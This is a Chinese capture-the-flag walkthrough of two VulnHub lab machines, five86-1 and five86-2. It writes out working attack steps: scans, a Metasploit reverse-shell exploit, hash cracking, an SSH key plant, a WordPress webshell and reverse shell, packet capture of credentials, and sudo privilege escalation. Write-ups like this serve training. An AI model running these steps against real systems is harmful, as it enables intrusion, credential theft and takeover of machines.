vulnhub five86系列靶机合集

five86 ~ VulnHubhttps://www.vulnhub.com/series/five86,272/

five86-1渗透过程

信息收集

# 主机发现
nmap 192.168.56.0/24 -Pn
​
# 靶机全面扫描
nmap 192.168.56.131 -A -T4

目录扫描

dirsearch -u http://192.168.56.131/

/robots.txt提示/ona。

/ona二层目录扫描。

弱口令登录OpenNetAdmin

/ona/login.php弱口令admin:admin成功登录。

OpenNetAdmin RCE漏洞利用

漏洞库搜索一下。

searchsploit opennetadmin

结合opennetadmin登录后的提示版本信息是v18.1.1，命令注入试一下。

msfconsole
use exploit/unix/webapp/opennetadmin_ping_cmd_injection
set LHOST 192.168.56.109
set RHOSTS 192.168.56.131
run

通过python获取tty。

python -c 'import pty;pty.spawn("/bin/bash")'

有五个用户。

在~/.htpasswd中得到提示：douglas的密码是十位，且包含aefhrt这些字符。

douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1

To make things slightly less painful (a standard dictionary will likely fail),

use the following character set for this 10 character password: aefhrt

crunch生成字典

根据提示生成密码字典。

crunch 10 10 aefhrt -o passwd.txt

$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1保存为hash。

John --wordlist=字典  hash

fatherrrrr

切换到douglas。

sudo提权到jen用户

cp命令可用。

结合douglas目录下的.ssh，将id_rsa.pub复制到/jen/.ssh目录下就能通过密钥登录了。

cp id_rsa.pub /tmp/authorized_keys
chmod 777 /tmp/authorized_keys
sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh

成功登录jen用户。

登录到moss用户

登录到jen用户时提示有邮件，在邮件中找到moss密码Fire!Fire!

suid提权到root

可疑文件upyourgame。

执行一下，一段乱输入后成功提权。

get flag.txt🎆

five86-2渗透过程

信息收集

# 主机发现
namp 192.168.56.0/24 -Pn
​
# 全面扫描靶机
nmap 192.168.56.132 -A -T4

开放端口20,21,80。

访问80端口，发现是WordPress框架，页面显示有些问题，需要添加映射关系。（其实不改也不影响wpscan工作）

vim /etc/hosts
# 添加
192.168.56.132  five86-2

wpscan爆破用户名密码

wpscan --url http://five86-2/ -e u,p,t

扫描得出admin,barney,gillian,peter,stephen五个用户，接着爆破密码。

wpscan --url http://five86-2/  -U user.txt -P /usr/share/wordlists/rockyou.txt

得到两组用户名密码。

barney/spooky1
​
stephen/apollo1

都登录看看权限，明显的barney权限更高，但不是管理员权限。插件这里看见只有Insert or Embed Articulate Content into WordPress Trial这个插件被激活了。

wpscan插件利用

搜索得知插件Insert or Embed Articulate Content into WordPress Trial可以RCE。

1. 准备两个文件，分别是index.html和一句话木马文件xx.php，压缩到zip文件中。

2. Posts——》Add New。

   上传准备好的压缩包。

   出现以下页面表示可行，点击insert。

   插入成功后会提示上传路径/wp-content/uploads/articulate_uploads/a5/index.html

3. 蚁剑连接。http://ip/wp-content/uploads/articulate_uploads/a5/xx.php

上传反弹shell文件php-reverse-shell.php

python3 -c 'import pty;pty.spawn("/bin/bash")'

wp-config.php找到数据库用户名密码dbuser/4Te3bRd483e

数据库操作：

show databases;
use wordpressdb;
show tables;
select * from wp_users;

注意WordPress是MD5加密

解不出来，先用之前获得的两组用户名密码试试，/home下有这两个用户。

成功切换到stephen。

tcpdump监听指定网卡获得敏感数据

id命令发现stephen在pcap组中。提示涉及到抓包？

# 打印所有可用作的接口
tcpdump -D
​
# 监控指定网卡120s将数据包写入/tmp/1.pcap
tcpdump -i vethf2b0415 -G 120 -W 1 -w /tmp/1.pcap

tcpdump -r 1.pcap读取数据包，得到ftp用户名和密码。paul/esomepasswford

通过密码成功切换到paul用户。

sudo提权

sudo提权。

service命令提权到peter用户。

sudo -u peter /usr/sbin/service ../../bin/sh

还是sudo提权。

可以以root权限运行passwd命令，那么直接修改root密码吧。sudo passwd root

get thisistheflag.txt🎆